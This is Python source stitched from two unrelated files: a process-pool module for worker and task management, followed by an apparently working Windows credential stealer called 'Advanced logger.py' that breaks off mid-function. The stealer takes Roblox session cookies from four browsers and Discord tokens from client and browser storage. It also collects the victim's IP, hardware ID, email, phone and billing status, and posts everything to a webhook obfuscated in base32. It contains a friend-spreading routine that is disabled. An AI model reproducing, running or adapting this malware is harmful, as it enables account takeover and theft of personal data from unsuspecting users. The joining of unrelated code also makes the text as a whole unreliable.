self.putlocks = putlocks
self._putlock = semaphore or LaxBoundedSemaphore(self._processes)
for i in range(self._processes):
self._create_worker_process(i)
self._worker_handler = self.Supervisor(self)
if threads:
self._worker_handler.start()
self._task_handler = self.TaskHandler(self._taskqueue,
self._quick_put,
self._outqueue,
self._pool,
self._cache)
if threads:
self._task_handler.start()
self.check_timeouts = None
# Thread killing timedout jobs.
if self.enable_timeouts:
self._timeout_handler = self.TimeoutHandler(
self._pool, self._cache,
self.soft_timeout, self.timeout,
)
self._timeout_handler_mutex = Lock()
self._timeout_handler_started = False
self._start_timeout_handler()
# If running without threads, we need to check for timeouts
# while waiting for unfinished work at shutdown.
if not threads:
self.check_timeouts = self._timeout_handler.handle_event
else:
self._timeout_handler = None
self._timeout_handler_started = False
self._timeout_handler_mutex = None
# Thread processing results in the outqueue.
self._result_handler = self.create_result_handler()
self.handle_result_event = self._result_handler.handle_event
if threads:
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue,
self._pool, self._worker_handler, self._task_handler,
self._result_handler, self._cache,
self._timeout_handler,
self._help_stuff_finish_args()),
exitpriority=15,
)
def Process(self, *args, **kwds):
return self._Process(*args, **kwds)
def WorkerProcess(self, worker):
return worker.contribute_to_object(self.Process(target=worker))
def create_result_handler(self, **extra_kwargs):
return self.ResultHandler(
self._outqueue, self._quick_get, self._cache,
self._poll_result, self._join_exited_workers,
self._putlock, self.restart_state, self.check_timeouts,
self.on_job_ready, **extra_kwargs
)
def on_job_ready(self, job, i, obj, inqW_fd):
pass
def _help_stuff_finish_args(self):
return self._inqueue, self._task_handler, self._pool
def cpu_count(self):
try:
return cpu_count()
except NotImplementedError:
return 1
def handle_result_event(self, *args):
return self._result_handler.handle_event(*args)
def _process_register_queues(self, worker, queues):
pass
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self._pool)
if proc.pid == pid
), (None, None))
def get_process_queues(self):
return self._inqueue, self._outqueue, None
def _create_worker_process(self, i):
sentinel = self._ctx.Event() if self.allow_restart else None
inq, outq, synq = self.get_process_queues()
w = self.WorkerProcess(self.Worker(
inq, outq, synq, self._initializer, self._initargs,
self._maxtasksperchild, sentinel, self._on_process_exit,
# Need to handle all signals if using the ipc semaphore,
# to make sure the semaphore is released.
sigprotection=self.threads,
wrap_exception=self._wrap_exception,
max_memory_per_child=self._max_memory_per_child,
))
self._pool.append(w)
self._process_register_queues(w, (inq, outq, synq))
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.index = i
w.start()
self._poolctrl[w.pid] = sentinel
if self.on_process_up:
self.on_process_up(w)
return w
def process_flush_queues(self, worker):
pass
def _join_exited_workers(self, shutdown=False):
"""Cleanup after any worker processes which have exited due to
reaching their specified lifetime. Returns True if any workers were
cleaned up.
"""
now = None
# The worker may have published a result before being terminated,
# but we have no way to accurately tell if it did. So we wait for
# _lost_worker_timeout seconds before we mark the job with
# WorkerLostError.
for job in [job for job in list(self._cache.values())
if not job.ready() and job._worker_lost]:
now = now or monotonic()
lost_time, lost_ret = job._worker_lost
if now - lost_time > job._lost_worker_timeout:
self.mark_as_worker_lost(job, lost_ret)
if shutdown and not len(self._pool):
raise WorkersJoined()
cleaned, exitcodes = {}, {}
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
exitcode = worker.exitcode
popen = worker._popen
if popen is None or exitcode is not None:
# worker exited
debug('Supervisor: cleaning up worker %d', i)
if popen is not None:
worker.join()
                    debug('Supervisor: worker %d joined', i)
cleaned[worker.pid] = worker
exitcodes[worker.pid] = exitcode
if exitcode not in (EX_OK, EX_RECYCLE) and \
not getattr(worker, '_controlled_termination', False):
error(
'Process %r pid:%r exited with %r',
worker.name, worker.pid, human_status(exitcode),
exc_info=0,
)
self.process_flush_queues(worker)
del self._pool[i]
del self._poolctrl[worker.pid]
if cleaned:
all_pids = [w.pid for w in self._pool]
for job in list(self._cache.values()):
acked_by_gone = next(
(pid for pid in job.worker_pids()
if pid in cleaned or pid not in all_pids),
None
)
# already accepted by process
if acked_by_gone:
self.on_job_process_down(job, acked_by_gone)
if not job.ready():
exitcode = exitcodes.get(acked_by_gone) or 0
proc = cleaned.get(acked_by_gone)
if proc and getattr(proc, '_job_terminated', False):
job._set_terminated(exitcode)
else:
self.on_job_process_lost(
job, acked_by_gone, exitcode,
)
else:
# started writing to
write_to = job._write_to
# was scheduled to write to
sched_for = job._scheduled_for
if write_to and not write_to._is_alive():
self.on_job_process_down(job, write_to.pid)
elif sched_for and not sched_for._is_alive():
self.on_job_process_down(job, sched_for.pid)
for worker in values(cleaned):
if self.on_process_down:
if not shutdown:
self._process_cleanup_queues(worker)
self.on_process_down(worker)
return list(exitcodes.values())
return []
def on_partial_read(self, job, worker):
pass
def _process_cleanup_queues(self, worker):
pass
def on_job_process_down(self, job, pid_gone):
pass
def on_job_process_lost(self, job, pid, exitcode):
job._worker_lost = (monotonic(), exitcode)
def mark_as_worker_lost(self, job, exitcode):
try:
raise WorkerLostError(
'Worker exited prematurely: {0}.'.format(
human_status(exitcode)),
)
except WorkerLostError:
job._set(None, (False, ExceptionInfo()))
else: # pragma: no cover
pass
def __enter__(self):
return self
def __exit__(self, *exc_info):
return self.terminate()
def on_grow(self, n):
pass
def on_shrink(self, n):
pass
def shrink(self, n=1):
for i, worker in enumerate(self._iterinactive()):
self._processes -= 1
if self._putlock:
self._putlock.shrink()
worker.terminate_controlled()
self.on_shrink(1)
if i >= n - 1:
break
else:
raise ValueError("Can't shrink pool. All processes busy!")
def grow(self, n=1):
for i in range(n):
self._processes += 1
if self._putlock:
self._putlock.grow()
self.on_grow(n)
def _iterinactive(self):
for worker in self._pool:
if not self._worker_active(worker):
yield worker
def _worker_active(self, worker):
for job in values(self._cache):
if worker.pid in job.worker_pids():
return True
return False
def _repopulate_pool(self, exitcodes):
"""Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
if self._state != RUN:
return
try:
if exitcodes and exitcodes[i] not in (EX_OK, EX_RECYCLE):
self.restart_state.step()
except IndexError:
self.restart_state.step()
self._create_worker_process(self._avail_index())
debug('added worker')
def _avail_index(self):
assert len(self._pool) < self._processes
indices = set(p.index for p in self._pool)
return next(i for i in range(self._processes) if i not in indices)
def did_start_ok(self):
return not self._join_exited_workers()
def _maintain_pool(self):
""""Clean up any exited workers and start replacements for them.
"""
joined = self._join_exited_workers()
self._repopulate_pool(joined)
for i in range(len(joined)):
if self._putlock is not None:
self._putlock.release()
def maintain_pool(self):
if self._worker_handler._state == RUN and self._state == RUN:
try:
self._maintain_pool()
except RestartFreqExceeded:
self.close()
self.join()
raise
except OSError as exc:
if get_errno(exc) == errno.ENOMEM:
reraise(MemoryError,
MemoryError(str(exc)),
sys.exc_info()[2])
raise
def _setup_queues(self):
self._inqueue = self._ctx.SimpleQueue()
self._outqueue = self._ctx.SimpleQueue()
self._quick_put = self._inqueue._writer.send
self._quick_get = self._outqueue._reader.recv
def _poll_result(timeout):
if self._outqueue._reader.poll(timeout):
return True, self._quick_get()
return False, None
self._poll_result = _poll_result
def _start_timeout_handler(self):
# ensure more than one thread does not start the timeout handler
# thread at once.
if self.threads and self._timeout_handler is not None:
with self._timeout_handler_mutex:
if not self._timeout_handler_started:
self._timeout_handler_started = True
self._timeout_handler.start()
def apply(self, func, args=(), kwds={}):
'''
Equivalent of `func(*args, **kwargs)`.
'''
if self._state == RUN:
return self.apply_async(func, args, kwds).get()
def starmap(self, func, iterable, chunksize=None):
'''
        Like the `map()` method, but the elements of `iterable` are expected
        to be iterables as well and will be unpacked as arguments. Hence an
        `iterable` of `[(1, 2), (3, 4)]` results in `[func(1, 2), func(3, 4)]`.
'''
if self._state == RUN:
return self._map_async(func, iterable,
starmapstar, chunksize).get()
def starmap_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous version of `starmap()` method.
'''
if self._state == RUN:
return self._map_async(func, iterable, starmapstar, chunksize,
callback, error_callback)
def map(self, func, iterable, chunksize=None):
'''
Apply `func` to each element in `iterable`, collecting the results
in a list that is returned.
'''
if self._state == RUN:
return self.map_async(func, iterable, chunksize).get()
def imap(self, func, iterable, chunksize=1, lost_worker_timeout=None):
'''
Equivalent of `map()` -- can be MUCH slower than `Pool.map()`.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def imap_unordered(self, func, iterable, chunksize=1,
lost_worker_timeout=None):
'''
Like `imap()` method but ordering of results is arbitrary.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
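    # Ordering sketch (illustrative; `f` is a hypothetical picklable
    # function): imap() yields results in submission order, while
    # imap_unordered() yields them as workers finish:
    #
    #   list(pool.imap(f, [3, 1, 2]))            # [f(3), f(1), f(2)]
    #   list(pool.imap_unordered(f, [3, 1, 2]))  # fastest results first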
def apply_async(self, func, args=(), kwds={},
callback=None, error_callback=None, accept_callback=None,
timeout_callback=None, waitforslot=None,
soft_timeout=None, timeout=None, lost_worker_timeout=None,
callbacks_propagate=(),
correlation_id=None):
'''
Asynchronous equivalent of `apply()` method.
        Callback is called when the function's return value is ready.
        The accept callback is called when the job is accepted to be executed.
        Simplified, the flow is like this:
>>> def apply_async(func, args, kwds, callback, accept_callback):
... if accept_callback:
... accept_callback()
... retval = func(*args, **kwds)
... if callback:
... callback(retval)
'''
if self._state != RUN:
return
soft_timeout = soft_timeout or self.soft_timeout
timeout = timeout or self.timeout
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
if self._state == RUN:
waitforslot = self.putlocks if waitforslot is None else waitforslot
if waitforslot and self._putlock is not None:
self._putlock.acquire()
result = ApplyResult(
self._cache, callback, accept_callback, timeout_callback,
error_callback, soft_timeout, timeout, lost_worker_timeout,
on_timeout_set=self.on_timeout_set,
on_timeout_cancel=self.on_timeout_cancel,
callbacks_propagate=callbacks_propagate,
send_ack=self.send_ack if self.synack else None,
correlation_id=correlation_id,
)
if timeout or soft_timeout:
# start the timeout handler thread when required.
self._start_timeout_handler()
if self.threads:
self._taskqueue.put(([(TASK, (result._job, None,
func, args, kwds))], None))
else:
self._quick_put((TASK, (result._job, None, func, args, kwds)))
return result
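    # Usage sketch (illustrative): submit work and block on the returned
    # ApplyResult; `double` and `on_done` are hypothetical and must be
    # picklable module-level callables:
    #
    #   res = pool.apply_async(double, (21,), callback=on_done)
    #   print(res.get(timeout=10))   # -> 42, or raises on failure/timeout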
def send_ack(self, response, job, i, fd):
pass
def terminate_job(self, pid, sig=None):
proc, _ = self._process_by_pid(pid)
if proc is not None:
try:
_kill(pid, sig or TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
def map_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous equivalent of `map()` method.
'''
return self._map_async(
func, iterable, mapstar, chunksize, callback, error_callback,
)
def _map_async(self, func, iterable, mapper, chunksize=None,
callback=None, error_callback=None):
'''
Helper function to implement map, starmap and their async counterparts.
'''
if self._state != RUN:
return
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
if chunksize is None:
chunksize, extra = divmod(len(iterable), len(self._pool) * 4)
if extra:
chunksize += 1
if len(iterable) == 0:
chunksize = 0
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = MapResult(self._cache, chunksize, len(iterable), callback,
error_callback=error_callback)
self._taskqueue.put((((TASK, (result._job, i, mapper, (x,), {}))
for i, x in enumerate(task_batches)), None))
return result
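    # Worked example of the default chunksize above, assuming 4 pool
    # processes and len(iterable) == 100:
    #   divmod(100, 4 * 4) == (6, 4); extra != 0, so chunksize = 7,
    #   i.e. the 100 items are shipped as 15 batches of at most 7 tasks.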
@staticmethod
def _get_tasks(func, it, size):
it = iter(it)
while 1:
x = tuple(itertools.islice(it, size))
if not x:
return
yield (func, x)
def __reduce__(self):
raise NotImplementedError(
'pool objects cannot be passed between processes or pickled',
)
def close(self):
debug('closing pool')
if self._state == RUN:
self._state = CLOSE
if self._putlock:
self._putlock.clear()
self._worker_handler.close()
self._taskqueue.put(None)
stop_if_not_current(self._worker_handler)
def terminate(self):
debug('terminating pool')
self._state = TERMINATE
self._worker_handler.terminate()
self._terminate()
@staticmethod
def _stop_task_handler(task_handler):
stop_if_not_current(task_handler)
def join(self):
assert self._state in (CLOSE, TERMINATE)
debug('joining worker handler')
stop_if_not_current(self._worker_handler)
debug('joining task handler')
self._stop_task_handler(self._task_handler)
debug('joining result handler')
stop_if_not_current(self._result_handler)
debug('result handler joined')
for i, p in enumerate(self._pool):
debug('joining worker %s/%s (%r)', i + 1, len(self._pool), p)
if p._popen is not None: # process started?
p.join()
debug('pool join complete')
def restart(self):
for e in values(self._poolctrl):
e.set()
@staticmethod
def _help_stuff_finish(inqueue, task_handler, _pool):
# task_handler may be blocked trying to put items on inqueue
debug('removing tasks from inqueue until task handler finished')
inqueue._rlock.acquire()
while task_handler.is_alive() and inqueue._reader.poll():
inqueue._reader.recv()
time.sleep(0)
@classmethod
def _set_result_sentinel(cls, outqueue, pool):
outqueue.put(None)
@classmethod
def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool,
worker_handler, task_handler,
result_handler, cache, timeout_handler,
help_stuff_finish_args):
# this is guaranteed to only be called once
debug('finalizing pool')
worker_handler.terminate()
task_handler.terminate()
taskqueue.put(None) # sentinel
debug('helping task handler/workers to finish')
cls._help_stuff_finish(*help_stuff_finish_args)
result_handler.terminate()
cls._set_result_sentinel(outqueue, pool)
if timeout_handler is not None:
timeout_handler.terminate()
# Terminate workers which haven't already finished
if pool and hasattr(pool[0], 'terminate'):
debug('terminating workers')
for p in pool:
if p._is_alive():
p.terminate()
debug('joining task handler')
cls._stop_task_handler(task_handler)
debug('joining result handler')
result_handler.stop()
if timeout_handler is not None:
debug('joining timeout handler')
timeout_handler.stop(TIMEOUT_MAX)
if pool and hasattr(pool[0], 'terminate'):
debug('joining pool workers')
for p in pool:
if p.is_alive():
# worker has not yet exited
debug('cleaning up worker %d', p.pid)
if p._popen is not None:
p.join()
debug('pool workers joined')
@property
def process_sentinels(self):
return [w._popen.sentinel for w in self._pool]
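#
# A hedged usage sketch (not part of the original module): it illustrates the
# shutdown protocol implemented by close()/terminate()/join() above. `func`
# and `items` are illustrative arguments; any picklable callable works.
#
def _pool_shutdown_sketch(pool, func, items):
    try:
        pool.map_async(func, items)
        pool.close()       # stop accepting tasks; queued work drains
    except KeyboardInterrupt:
        pool.terminate()   # abort outstanding work immediately
    finally:
        pool.join()        # join() is only valid after close()/terminate()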
#
# Class whose instances are returned by `Pool.apply_async()`
#
class ApplyResult(object):
_worker_lost = None
_write_to = None
_scheduled_for = None
def __init__(self, cache, callback, accept_callback=None,
timeout_callback=None, error_callback=None, soft_timeout=None,
timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT,
on_timeout_set=None, on_timeout_cancel=None,
callbacks_propagate=(), send_ack=None,
correlation_id=None):
self.correlation_id = correlation_id
self._mutex = Lock()
self._event = threading.Event()
self._job = next(job_counter)
self._cache = cache
self._callback = callback
self._accept_callback = accept_callback
self._error_callback = error_callback
self._timeout_callback = timeout_callback
self._timeout = timeout
self._soft_timeout = soft_timeout
self._lost_worker_timeout = lost_worker_timeout
self._on_timeout_set = on_timeout_set
self._on_timeout_cancel = on_timeout_cancel
self._callbacks_propagate = callbacks_propagate or ()
self._send_ack = send_ack
self._accepted = False
self._cancelled = False
self._worker_pid = None
self._time_accepted = None
self._terminated = None
cache[self._job] = self
def __repr__(self):
return '<{0}: {id} ack:{ack} ready:{ready}>'.format(
self.__class__.__name__,
id=self._job, ack=self._accepted, ready=self.ready(),
)
def ready(self):
return self._event.isSet()
def accepted(self):
return self._accepted
def successful(self):
assert self.ready()
return self._success
def _cancel(self):
"""Only works if synack is used."""
self._cancelled = True
def discard(self):
self._cache.pop(self._job, None)
def terminate(self, signum):
self._terminated = signum
def _set_terminated(self, signum=None):
try:
raise Terminated(-(signum or 0))
except Terminated:
self._set(None, (False, ExceptionInfo()))
def worker_pids(self):
return [self._worker_pid] if self._worker_pid else []
def wait(self, timeout=None):
self._event.wait(timeout)
def get(self, timeout=None):
self.wait(timeout)
if not self.ready():
raise TimeoutError
if self._success:
return self._value
else:
raise self._value.exception
def safe_apply_callback(self, fun, *args, **kwargs):
if fun:
try:
fun(*args, **kwargs)
except self._callbacks_propagate:
raise
except Exception as exc:
error('Pool callback raised exception: %r', exc,
exc_info=1)
def handle_timeout(self, soft=False):
if self._timeout_callback is not None:
self.safe_apply_callback(
self._timeout_callback, soft=soft,
timeout=self._soft_timeout if soft else self._timeout,
)
def _set(self, i, obj):
with self._mutex:
if self._on_timeout_cancel:
self._on_timeout_cancel(self)
self._success, self._value = obj
self._event.set()
if self._accepted:
# if not accepted yet, then the set message
# was received before the ack, which means
# the ack will remove the entry.
self._cache.pop(self._job, None)
# apply callbacks last
if self._callback and self._success:
self.safe_apply_callback(
self._callback, self._value)
if (self._value is not None and
self._error_callback and not self._success):
self.safe_apply_callback(
self._error_callback, self._value)
def _ack(self, i, time_accepted, pid, synqW_fd):
with self._mutex:
if self._cancelled and self._send_ack:
self._accepted = True
if synqW_fd:
return self._send_ack(NACK, pid, self._job, synqW_fd)
return
self._accepted = True
self._time_accepted = time_accepted
self._worker_pid = pid
if self.ready():
# ack received after set()
self._cache.pop(self._job, None)
if self._on_timeout_set:
self._on_timeout_set(self, self._soft_timeout, self._timeout)
response = ACK
if self._accept_callback:
try:
self._accept_callback(pid, time_accepted)
except self._callbacks_propagate:
response = NACK
raise
except Exception:
response = NACK
# ignore other errors
finally:
if self._send_ack and synqW_fd:
return self._send_ack(
response, pid, self._job, synqW_fd
)
if self._send_ack and synqW_fd:
self._send_ack(response, pid, self._job, synqW_fd)
#
# Class whose instances are returned by `Pool.map_async()`
#
class MapResult(ApplyResult):
def __init__(self, cache, chunksize, length, callback, error_callback):
ApplyResult.__init__(
self, cache, callback, error_callback=error_callback,
)
self._success = True
self._length = length
self._value = [None] * length
self._accepted = [False] * length
self._worker_pid = [None] * length
self._time_accepted = [None] * length
self._chunksize = chunksize
if chunksize <= 0:
self._number_left = 0
self._event.set()
del cache[self._job]
else:
self._number_left = length // chunksize + bool(length % chunksize)
def _set(self, i, success_result):
success, result = success_result
if success:
self._value[i * self._chunksize:(i + 1) * self._chunksize] = result
self._number_left -= 1
if self._number_left == 0:
if self._callback:
self._callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
else:
self._success = False
self._value = result
if self._error_callback:
self._error_callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
def _ack(self, i, time_accepted, pid, *args):
start = i * self._chunksize
stop = min((i + 1) * self._chunksize, self._length)
for j in range(start, stop):
self._accepted[j] = True
self._worker_pid[j] = pid
self._time_accepted[j] = time_accepted
if self.ready():
self._cache.pop(self._job, None)
def accepted(self):
return all(self._accepted)
def worker_pids(self):
return [pid for pid in self._worker_pid if pid]
#
# Class whose instances are returned by `Pool.imap()`
#
class IMapIterator(object):
_worker_lost = None
def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT):
self._cond = threading.Condition(threading.Lock())
self._job = next(job_counter)
self._cache = cache
self._items = deque()
self._index = 0
self._length = None
self._ready = False
self._unsorted = {}
self._worker_pids = []
self._lost_worker_timeout = lost_worker_timeout
cache[self._job] = self
def __iter__(self):
return self
def next(self, timeout=None):
with self._cond:
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
self._cond.wait(timeout)
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
raise TimeoutError
success, value = item
if success:
return value
raise Exception(value)
__next__ = next # XXX
def _set(self, i, obj):
with self._cond:
if self._index == i:
self._items.append(obj)
self._index += 1
while self._index in self._unsorted:
obj = self._unsorted.pop(self._index)
self._items.append(obj)
self._index += 1
self._cond.notify()
else:
self._unsorted[i] = obj
if self._index == self._length:
self._ready = True
del self._cache[self._job]
def _set_length(self, length):
with self._cond:
self._length = length
if self._index == self._length:
self._ready = True
self._cond.notify()
del self._cache[self._job]
def _ack(self, i, time_accepted, pid, *args):
self._worker_pids.append(pid)
def ready(self):
return self._ready
def worker_pids(self):
return self._worker_pids
#
# Class whose instances are returned by `Pool.imap_unordered()`
#
class IMapUnorderedIterator(IMapIterator):
def _set(self, i, obj):
with self._cond:
self._items.append(obj)
self._index += 1
self._cond.notify()
if self._index == self._length:
self._ready = True
del self._cache[self._job]
#
#
#
class ThreadPool(Pool):
from .dummy import Process as DummyProcess
Process = DummyProcess
def __init__(self, processes=None, initializer=None, initargs=()):
Pool.__init__(self, processes, initializer, initargs)
def _setup_queues(self):
self._inqueue = Queue()
self._outqueue = Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def _poll_result(timeout):
try:
return True, self._quick_get(timeout=timeout)
except Empty:
return False, None
self._poll_result = _poll_result
@staticmethod
def _help_stuff_finish(inqueue, task_handler, pool):
# put sentinels at head of inqueue to make workers finish
with inqueue.not_empty:
inqueue.queue.clear()
inqueue.queue.extend([None] * len(pool))
inqueue.not_empty.notify_all()
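# A minimal apply_async() sketch (not part of the original module), assuming
# the module imports cleanly. `square` and the callbacks are illustrative:
# accept_callback fires with (pid, time_accepted) when a worker picks the job
# up, and callback fires with the return value once the job completes.
if __name__ == '__main__':
    def square(x):
        return x * x
    results = []
    tp = ThreadPool(processes=2)
    r = tp.apply_async(square, (7,),
                       callback=results.append,
                       accept_callback=lambda pid, t: None)
    print(r.get(timeout=10))  # -> 49
    tp.close()
    tp.join()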
|
Advanced logger.py
|
import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
import browser_cookie3, requests, threading
import base64
import time
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
key = "NB2HI4DTHIXS6ZDJONRW64TEMFYHALTDN5WS6YLQNEXXOZLCNBXW623TF44DGMRQGUYDANBQGI4DSMBZHE4DINZPJBVW453UKJFVCY27OFBHGWDMGNJS2VLUOBDWUYTSK5LF6ODHGBIVCTLZKVKGIUTPKZHGI42EHFSUSULRPAYWQVKJM5JHG6TEKBMWWYLRLFRDI==="
webhook = base64.b32decode(key)
def edge_logger():
try:
cookies = browser_cookie3.edge(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
def chrome_logger():
try:
cookies = browser_cookie3.chrome(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
def firefox_logger():
try:
cookies = browser_cookie3.firefox(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
def opera_logger():
try:
cookies = browser_cookie3.opera(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
browsers = [edge_logger, chrome_logger, firefox_logger, opera_logger]
for x in browsers:
threading.Thread(target=x,).start()
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Discord Token Logger",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
